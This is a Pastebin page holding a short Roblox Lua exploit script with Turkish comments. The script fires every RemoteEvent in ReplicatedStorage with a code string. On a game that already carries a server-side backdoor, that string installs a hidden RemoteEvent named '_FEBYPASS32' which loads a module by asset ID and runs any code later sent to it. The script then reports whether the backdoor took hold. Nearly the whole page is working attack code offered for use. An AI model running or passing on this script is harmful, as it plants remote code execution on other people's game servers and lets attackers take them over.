Advertisement
Steamhesaproblox

Roblox Remotefunction script

May 14th, 2025
642
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
RBScript 1.10 KB | Gaming | 0 0
  1. -- Scanner Başlangıcı
  2. local timeout = 5
  3. local timer = 0
  4.  
  5. -- Remote tarama fonksiyonu
  6. local function scanForRemote(parent)
  7.     for _, child in pairs(parent:GetDescendants()) do
  8.         if child:IsA("RemoteEvent") then
  9.             pcall(function()
  10.                 child:FireServer([[
  11.                     local folder = Instance.new('RemoteEvent')
  12.                     folder.Name = "_FEBYPASS32"
  13.                     folder.Parent = game:GetService("JointsService")
  14.                     local loadstring = require(13684410229)
  15.                     folder.OnServerEvent:Connect(function(_1,_2)
  16.                         loadstring(_2)()
  17.                     end)
  18.                 ]])
  19.             end)
  20.         end
  21.     end
  22. end
  23.  
  24. -- RemoteEvent'leri tara
  25. scanForRemote(game:GetService("ReplicatedStorage"))
  26.  
  27. -- Sonuç kontrolü
  28. repeat wait(0.1) timer += 0.1 until game:GetService("JointsService"):FindFirstChild("_FEBYPASS32") or timer >= timeout
  29.  
  30. if game:GetService("JointsService"):FindFirstChild("_FEBYPASS32") then
  31.     print("✅ Backdoor bulundu!")
  32. else
  33.     print("❌ Backdoor bulunamadı.")
  34. end
  35.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement